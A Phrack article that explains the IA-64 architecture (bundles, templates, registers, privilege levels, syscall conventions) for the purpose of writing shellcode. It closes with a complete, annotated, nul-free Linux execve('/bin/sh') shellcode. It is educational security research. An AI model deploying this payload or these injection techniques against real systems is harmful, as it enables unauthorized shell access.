==Phrack Inc.==

               Volume 0x0b, Issue 0x39, Phile #0x05 of 0x12

|=-------------------=[ WRITING SHELLCODE FOR IA-64 ]=-------------------=|
|=-----------=[ or: 'how to turn diamonds into jelly beans' ]------------=|
|=--------------------=[ papasutra of haquebright ]=---------------------=|


- Intro
- Big Picture
- Architecture
  - EPIC
  - Instructions
  - Bundles
  - Instruction Types and Templates
  - Registers
  - Register List
  - Register Stack Engine
  - Dependency Conflicts
  - Alignment and Endianness
  - Memory Protection
  - Privilege Levels
- Coding
  - GCC IA-64 Assembly Language
  - Useful Instruction List
  - Optimization
  - Coding Aspects
- Example Code
- References
- Greetings


--> Intro

This paper outlines the techniques you need and the things I've
learned about writing shellcode for the IA-64. Although the IA-64 is
capable of executing IA-32 code, this is not topic of this paper.
Example code is for Linux, but most of this applies to all operating
systems that run on IA-64.


--> Big Picture 

IA-64 is the successor to IA-32, formerly called the i386
architecture, which is implemented in all those PC chips like Pentium
and Athlon and so on.
It is developed by Intel and HP since 1994, and is available in the
Itanium chip. IA-64 will probably become the main architecture for the
Unix workstations of HP and SGI, and for Microsoft Windows. It is a 64
bit architecture, and is as such capable of doing 64 bit integer
arithmetic in hardware and addressing 2^64 bytes of memory. A very
interesting feature is the parallel execution of code, for which a
very special binary format is used.
So lets get a little more specific.


--> EPIC

On conventional architectures, parallel code execution is made
possible by the chip itself. The instructions read are analyzed,
reordered and grouped by the hardware at runtime, and therefore only
very conservative assumptions can be made.
EPIC stands for 'explicit parallel instruction computing'. It works by
grouping the code into independent parts at compile time, that is, the
assembly code must already contain the dependency information.


--> Instructions

The instruction size is fixed at 41 bits. Each instruction is made up
of five fields:

+-----------+-----------+-----------+-----------+-----------+
| opcode    | operand 1 | operand 2 | operand 3 | predicate |
+-----------+-----------+-----------+-----------+-----------+
| 40 to 27  | 26 to 20  | 19 to 13  | 12 to 6   | 5 to 0    |
+-----------+-----------+-----------+-----------+-----------+

The large opcode space of 14 bits is used for specializing
operations. For example, there are different branch instructions for
branches that are taken often and ones taken seldomly. This extra
information is then used in the branch prediction unit.

There are three operand fields usable for immediate values or register
numbers. Some instructions combine all three operand fields to a
single 21 bit immediate value field. It is also possible to append a
complete 41 bit instruction slot to another one to form a 64 bit
immediate value field.

The last field references a so called predicate register by a 6 bit
number. Precicate registers each contain a single bit to represent the
boolean values 'true' and 'false'. If the value is 'false' at
execution time, the instruction is discarded just before it takes
effect. Note that some instructions cannot be predicated.

If a certain operation does not need a certain field in the scheme
above, it is set to zero by the assembler. I tried to fill in other
values, and it still worked. But this may not be the case for every
instruction and every implementation of the IA-64 architecture. So be
careful about this...
Also note that there are some shortcut instructions such as mov, which
for real is just an add operation with register 0 (constant 0) as the
other argument.


--> Bundles

In the compiled code, instructions are grouped together to 'bundles'
of three. Included in every bundle is a five bit template field that
specifies which hardware units are needed for the execution.
So what it boils down to is a bundle length of 128 bits. Nice, eh?

+-----------+----------+---------+----------+
| instr 1   | instr 2  | instr 3 | template |
|-----------+----------+---------+----------|
| 127 to 87 | 86 to 46 | 45 to 5 | 4 to 0   |
+-----------+----------+---------+----------+

Templates are used to dispatch the instructions to the different
hardware units. This is quite straightforward, the dispatcher just has
to switch over the template bits.

Templates can also encode a so-called 'stop' after instruction slots.
Stops are used to break parallel instruction execution, and you will
need them to solve Data Flow Dependencies (see below). You can put a
stop after every complete bundle, but if you need to save space, it is
often better to stop after an instruction in the middle of a bundle.
This does not work for every template, so you need to check the
template table below for this.

The independent code regions between stops are called instruction
groups. Making use of the parallel semantics they carry, the Itanium
for example is capable of executing up to two bundles at once, if
there are enough execution units for the set of instructions specified
in the templates. In the next implementations the numbers will be
higher for sure.


--> Instruction Types and Templates

There are different instruction types, grouped by the hardware unit
they need. Only certain combinations are allowed in a single bundle.
Instruction types are A (ALU Integer), I (Non-ALU Integer), M
(Memory), F (Floating Point), B (Branch) and L+X (Extended). The X
slots may also contain break.i and nop.i for compatibility reasons.

In the following template list, '|' is a stop:

00 M I I
01 M I I|
02 M I|I     <- in-bundle stop
03 M I|I|    <- in-bundle stop
04 M L X
05 M L X|
06 reserved
07 reserved
08 M M I
09 M M I|
0a M|M I     <- in-bundle stop
0b M|M I|    <- in-bundle stop
0c M F I
0d M F I|
0e M M F
0f M M F|
10 M I B
11 M I B|
12 M B B
13 M B B|
14 reserved
15 reserved
16 B B B
17 B B B|
18 M M B
19 M M B|
1a reserved
1b reserved
1c M F B
1d M F B|
1e reserved
1f reserved


--> Registers

This is not a comprehensive list, check [1] if you need one.

IA-64 specifies 128 general (integer) registers (r0..r127). There are
128 floating point registers, too (f0..f127).

Predicate Registers (p0..p63) are used for optimizing runtime
decisions. For example, 'if' results can be handled without branches
by setting a predicate register to the result of the 'if', and using
that predicate for the conditional code. As outlined above, predicate
registers are referenced by a field in every instruction. If no
register is specified, p0 is filled in by the assembler. p0 is always
'true'.

Branch Registers (b0..b7) are used for indirect branches and
calling. Branch instructions can only handle branch registers. When
calling a function, the return address is stored in b0 by
convention. It is saved to local registers by the called function if
it needs to call other functions itself.

There are the special registers Loop Count (LC) and Epilogue Count
(EC). Their use is explained in the optimization chapter.

The Current Frame Marker (CFM) holds the state of the register
rotation. It is not accessible directly. The Instruction Pointer (IP)
contains the address of the bundle that is currently executed.

The User Mask (UM):
+-------+-------------------------------------------------------------+
| flag  | purpose                                                     |
+-------+-------------------------------------------------------------+
| UM.be | set this to 1 for big endian data access                    |
| UM.ac | if this is 0, Unaligned Memory Faults are raised only if    |
|       | the situation cannot be handled by the processor at all     |
+-------+-------------------------------------------------------------+
The User Mask can be modified from any privilege level (see below).

Some interesting Processor Status Register (PSM) fields:
+---------+-----------------------------------------------------------+
| flag    | purpose                                                   |
+---------+-----------------------------------------------------------+
| PSR.pk  | if this is 0, protection key checks are disabled          |
| PSR.dt  | if this is 0, physical addressing is used for data        |
|         | access; access rights are not checked.                    |
| PSR.it  | if this is 0, physical addressing is used for instruction |
|         | access; access rights are not checked.                    |
| PSR.rt  | if this is 0, the register stack translation is disabled  |
| PSR.cpl | this is the current privilege level. See its chapter for  |
|         | details.                                                  |
+---------+-----------------------------------------------------------+
All but the last of these fields can only be modifiled from privilege
level 0 (see below).


--> Register List

+---------+------------------------------+
| symbol  | Usage Convention             |
+---------+------------------------------+
| b0      | Call Register                |
| b1-b5   | Must be preserved            |
| b6-b7   | Scratch                      |
| r0      | Constant Zero                |
| r1      | Global Data Pointer          |
| r2-r3   | Scratch                      |
| r4-r5   | Must be preserved            |
| r8-r11  | Procedure Return Values      |
| r12     | Stack Pointer                |
| r13     | (Reserved as) Thread Pointer |
| r14-r31 | Scratch                      |
| r32-rxx | Argument Registers           |
| f2-f5   | Preserved                    |
| f6-f7   | Scratch                      |
| f8-f15  | Argument/Return Registers    |
| f16-f31 | Must be preserved            |
+---------+------------------------------+
Additionaly, LC must be preserved.


--> Register Stack Engine

IA-64 provides you with a register stack. There is a register frame,
consisting of input (in), local (loc), and output (out) registers. To
allocate a stack frame, use the 'alloc' instruction (see [1]). When a
function is called, the stack frame is shifted, so that the former
output registers become the new input registers. Note that you need to
allocate a stack frame even if you only want to access the input
registers.

Unlike on SPARC, there are no 'save' and 'restore' instructions needed
in this scheme. Also, the (memory) stack is not used to pass arguments
to functions. 

The Register Stack Engine also provides you with register
rotation. This makes modulo-scheduling possible, see the optimization
chapter for this. The 'alloc' described above specifies how many
general registers rotate, the rotating region always begins at r32,
and overlaps the local and output registers. Also, the predicate
registers p16 to p63 and the floating point register f32 to f127
rotate.


--> Dependency Conflicts

Dependency conflicts are formally classified into three categories:

- Control Flow Conflicts

These occur when assumptions are made if a branch is taken or not.
For example, the code following a branch instruction must be discarded
when it is taken. On IA-64, this happens automatically. But if the
code is optimized using control speculation (see [1]), control flow
conflicts must be resolved manually. Hardware support is provided.

- Memory Conflicts

The reason for memory conflicts is the higher latency of memory
accesses compared to register accesses. Memory access is therefore
causing the execution to stall. IA-64 introduces data speculation (see
[1]) to be able to move loads to be executed as early as possible in
the code.

- Data Flow Conflicts
These occur when there are instructions that share registers or memory
fields in a block marked for parallel execution. This leads to
undefined behavior and must be prevented by the coder. This is the
type of conflict that will bother you the most, especially when trying
to write compact code!


--> Alignment and Endianess

As on many other architectures, you have to align your data and
code. On IA-64, code must be aligned on 16 byte boundaries, and is
stored in little endian byte order. Data fields should be aligned
according to their size, so an 8 bit char should be aligned on 1 byte
boundaries. There is a special rule for 10 byte floating point numbers
(should you ever need them), that is you have to align it on 16 byte
boundaries. Data endianess is controlled by the UM.be bit in the user
mask ('be' means big endian enable). On IA-64 Linux, little endian is
default.


--> Memory Protection

Memory is divided into several virtual pages. There is a set of
Protection Key Registers (PKR) that contain all keys required for a
process. The Operating System manages the PKR. Before memory access is
permitted, the key of the respective memory field (which is stored in
the Translation Lookaside Buffer) is compared to all the PKR keys. If
none matches, a Key Miss fault is raised. If there is a matching key,
it is checked for read, write and execution rights. Access
capabilities are calculated from the key's access rights field, the
privilege level of the memory page and the current privilege level
of the executing code (see [1] for details). If an operation is to be
performed which is not covered by the calculated capabilities, a Key
Permission Fault is generated.


--> Privilege Levels

There are four privilege levels numbered from 0..3, with 0 being the
most privileged one. System instructions and registers can only be
called from level 0. The current privilege level (CPL) is stored in
PSR.cpl. The following instructions change the CPL:

- enter privileged code (epc)
The epc instruction sets the CPL to the privilege level of the page
containing the epc instruction, if it is numerically higher than the
CPL. The page must be execute only, and the CPL must not be
numerically lower than the previous privilege level.

- break
'break' issues a Break Instruction Fault. As every instruction fault
on IA-64, this sets the CPL to 0. The immediate value stored in the
break encoding is the address of the handler.

- branch return
This resets the CPL to previous value.


--> GCC IA-64 Assembly Language

As you should have figured out by now, assembly language is normally
not used to program a chip like this. The optimization techniques are
very difficult for a programmer to exploit by hand (although possible
of course). Assembly will always be used to call some processor ops
that programming languanges do not support directly, for algoritm
coding, and for shellcode of course.

The syntax basically works like this:
(predicate_num) opcode_name operand_1 = operand_2, operand_3
Example:
(p1) fmul f1 = f2, f3

As mentioned in the instruction format chapter, sometimes not all
operand fields are used, or operand fields are combined.
Additionally, there are some instructions which cannot be predicated.

Stops are encoded by appending ';;' to the last instruction of an
instruction group. Symbolic names are used to reference procedures, as
always.


--> Useful Instruction List

Although you will have to check [3] in any case, here are a very few
instructions you may want to check first:
+--------+------------------------------------------------------------+
| name   | description                                                |
+--------+------------------------------------------------------------+
| dep    | deposit an 8 bit immediate value at an arbitrary position  |
|        | in a register                                              |
| dep    | deposit a portion of one reg into another                  |
| mov    | branch register to general register                        |
| mov    | max 22 bit immediate value to general register             |
| movl   | max 64 bit immediate value to general register             |
| adds   | add short                                                  |
| branch | indirect form, non-call                                    |
+--------+------------------------------------------------------------+


--> Optimizations

There are some optimization techniques that become possible on
IA-64. However because the topic of this paper is not how to write
fast code, they are not explained here. Check [5] for more information
about this, especially look into Modulo Scheduling. It allows you to
overlap multiple iterations of a loop, which leads to very compact
code.


--> Coding Aspects

Stack: As on IA-32, the stack grows to the lower memory
addresses. Only local variables are stored on the stack.

System calls: Although the epc instruction is meant to be used
instead, Linux on IA-64 uses Break Instruction Faults to do a system
call. According to [6], Linux will switch to epc some day, but this
has not yet happened. The handler address used for issuing a system
call is 0x100000. As stated above, break can only use immediate values
as handler addresses. This introduces the need to construct the break
instruction in the shellcode. This is done in the example code below.

Setting predicates: Do that by using the compare (cmp)
instructions. Predicates might also come handy if you need to fill
some space with instructions, and want to cancel them out to form
NOPs.

Getting the hardware: Check [2] or [7] for experimenting with IA-64,
if you do not have one yourself.


--> Example Code

<++> ia64-linux-execve.c !f4ed8837
/*
 * ia64-linux-execve.c
 * 128 bytes.
 *
 *
 * NOTES:
 *
 * the execve system call needs:
 * - command string addr in r35
 * - args addr in r36
 * - env addr in r37
 *
 * as ia64 has fixed-length instructions (41 bits), there are a few
 * instructions that have unused bits in their encoding.
 * i used that at two points where i did not find nul-free equivalents.
 * these are marked '+0x01', see below.
 *
 * it is possible to save at least one instruction by loading bundle[1]
 * as a number (like bundle[0]), but that would be a less interesting
 * solution.
 *
 */

unsigned long shellcode[] = {

  /* MLX
   * alloc r34 = ar.pfs, 0, 3, 3, 0   // allocate vars for syscall
   * movl r14 = 0x0168732f6e69622f    // aka "/bin/sh",0x01
   * ;; */
  0x2f6e458006191005,
  0x631132f1c0016873,

  /* MLX
   * xor r37 = r37, r37               // NULL
   * movl r17 = 0x48f017994897c001    // bundle[0]
   * ;; */
  0x9948a00f4a952805,
  0x6602e0122048f017,

  /* MII
   * adds r15 = 0x1094, r37           // unfinished bundle[1]
   * or r22 = 0x08, r37               // part 1 of bundle[1]
   * dep r12 = r37, r12, 0, 8         // align stack ptr
   * ;; */
  0x416021214a507801,
  0x4fdc625180405c94,

  /* MII
   * adds r35 = -40, r12              // circling mem addr 1, shellstr addr
   * adds r36 = -32, r12              // circling mem addr 2, args[0] addr
   * dep r15 = r22, r15, 56, 8        // patch bundle[1] (part 1)
   * ;; */
  0x0240233f19611801,
  0x41dc7961e0467e33,

  /* MII
   * st8 [r36] = r35, 16              // args[0] = shellstring addr
   * adds r19 = -16, r12              // prepare branch addr: bundle[0] addr
   * or r23 = 0x42, r37               // part 2 of bundle[1]
   * ;; */
  0x81301598488c8001,
  0x80b92c22e0467e33,

  /* MII
   * st8 [r36] = r17, 8               // store bundle[0]
   * dep r14 = r37, r14, 56, 8        // fix shellstring
   * dep r15 = r23, r15, 16, 8        // patch bundle[1] (part 2)
   * ;; */
  0x28e0159848444001,
  0x4bdc7971e020ee39,

  /* MMI
   * st8 [r35] = r14, 25              // store shellstring
   * cmp.eq p2, p8 = r37, r37         // prepare predicate for final branch.
   * mov b6 = r19                     // (+0x01) setup branch reg
   * ;; */
  0x282015984638c801,
  0x07010930c0701095,

  /* MIB
   * st8 [r36] = r15, -16             // store bundle[1]
   * adds r35 = -25, r35              // correct string addr
   * (p2) br.cond.spnt.few b6         // (+0x01) branch to constr. bundle
   * ;; */
  0x3a301799483f8011,
  0x0180016001467e8f,
};

/*
 * the constructed bundle
 *
 * MII
 * st8 [r36] = r37, -8                // args[1] = NULL
 * adds r15 = 1033, r37               // syscall number
 * break.i 0x100000
 * ;;
 *
 * encoding is:
 * bundle[0] = 0x48f017994897c001
 * bundle[1] = 0x0800000000421094
 */
<-->

--> References

[1] HP IA-64 instruction set architecture guide
    http://devresource.hp.com/devresource/Docs/Refs/IA64ISA/
[2] HP IA-64 Linux Simulator and Native User Environment
    http://www.software.hp.com/products/LIA64/
[3] Intel IA-64 Manuals
    http://developer.intel.com/design/ia-64/manuals/
[4] Sverre Jarp: IA-64 tutorial
    http://cern.ch/sverre/IA64_1.pdf
[5] Sverre Jarp: IA-64 performance-oriented programming
    http://sverre.home.cern.ch/sverre/IA-64_Programming.html
[6] A presentation about the Linux port to IA-64
    http://linuxia64.org/logos/IA64linuxkernel.PDF
[7] Compaq Testdrive Program
    http://www.testdrive.compaq.com

The register list is mostly copied from [4]


--> Greetings

palmers, skyper and scut of team teso
honx and homek of dudelab

|=[ EOF ]=---------------------------------------------------------------=|